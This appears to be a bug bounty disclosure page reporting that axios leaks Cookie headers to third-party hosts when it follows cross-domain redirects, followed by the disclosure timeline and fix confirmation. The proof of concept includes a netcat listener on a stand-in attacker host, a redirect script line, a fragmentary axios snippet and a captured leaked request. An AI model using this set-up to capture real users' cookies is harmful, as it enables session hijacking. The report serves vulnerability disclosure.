Exposure of Sensitive Information to an Unauthorized Actor in axios/axios


Reported on

Jan 5th 2022


Cookie header leaked to third party site and it allow to hijack victim account


When fetching a remote url with Cookie if it get Location response header then it will follow that url and try to fetch that url with provided cookie . So cookie is leaked here to thirdparty.
Ex: you try to fetch example.com with cookie and if it get redirect url to attacker.com then it fetch that redirect url with provided cookie .
So, Cookie of example.com is leaked to attacker.com .
Cookie is standard way to authentication into webapp and you should not leak to other site .
All browser follow same-origin-policy so that when redirect happen browser does not send cookie of example.com to attacker.com .


if you fetch http://mysite.com/redirect.php?url=http://attacker.com:8182/ then it will redirect to http://attacker.com:8182/ .

First setup a webserver and a netcat listner


header("Location: $url");

/* Make sure that code below does not get executed when we redirect. */

netcat listner in http://attacker.com

nc -lnvp 8182


run bellow axios code

const axios = require('axios');

// Make a request for a user with a given ID
  .then(function (response) {
    // handle success
  .catch(function (error) {
    // handle error
  .then(function () {
    // always executed

response received in attacker netcat

Connection from 36724 received!
GET /yy HTTP/1.1
Accept: application/json, text/plain, */*
Cookie: dfdd=df
User-Agent: axios/0.24.0
Host: localhost:8182
Connection: close

So, here i provided cookie for mysite.com but due to redirect it leaks to thirdparty site attacker.com


If provided url domain and redirect url domain is same then you can only send cookie/authorization header to redirected url . But if the both domain not same then its a third party site which will be redirected, so you dont need to send Cookie/Authorization header.

We are processing your report and will contact the axios team within 24 hours. 5 months ago
We have contacted a member of the axios team and are waiting to hear back 5 months ago
We have sent a follow up to the axios team. We will try again in 7 days. 5 months ago
5 months ago


Thanks I can see how this would be a issue, I will get back to you soon with a fix

5 months ago


thanks for reply . Here is another similar report https://huntr.dev/bounties/fc524e4b-ebb6-427d-ab67-a64181020406/ to another repo . Maintainer has fixed this bug by verifying the current domain and redirected domain check .
If current url domain is same with redirected url domain then no problem . But if current domain and redirect domain is different then dont need to send cookie of current domain to redirect domain to prevent this cookie leak .

ranjit-git modified the report
5 months ago
4 months ago


Hi , i just saw the axios uses follow-redirect which was vulnerable to this attack . https://github.com/follow-redirects/follow-redirects/issues/183#issuecomment-1012265743

We have sent a second follow up to the axios team. We will try again in 10 days. 4 months ago
We have sent a third and final follow up to the axios team. This report is now considered stale. 4 months ago
2 months ago


any update?

Jay validated this vulnerability 2 months ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
We have sent a fix follow up to the axios team. We will try again in 7 days. 2 months ago
We have sent a second fix follow up to the axios team. We will try again in 10 days. a month ago
We have sent a third and final fix follow up to the axios team. This report is now considered stale. a month ago
Pavlos Moros
a month ago


@maintainer could you please mark this vulnerability as fixed? :)

Jay confirmed that a fix has been merged on c9aca7 a month ago
The fix bounty has been dropped
Jamie Slome
24 days ago


The CVE has been revoked here due to the following discussion.

to join this conversation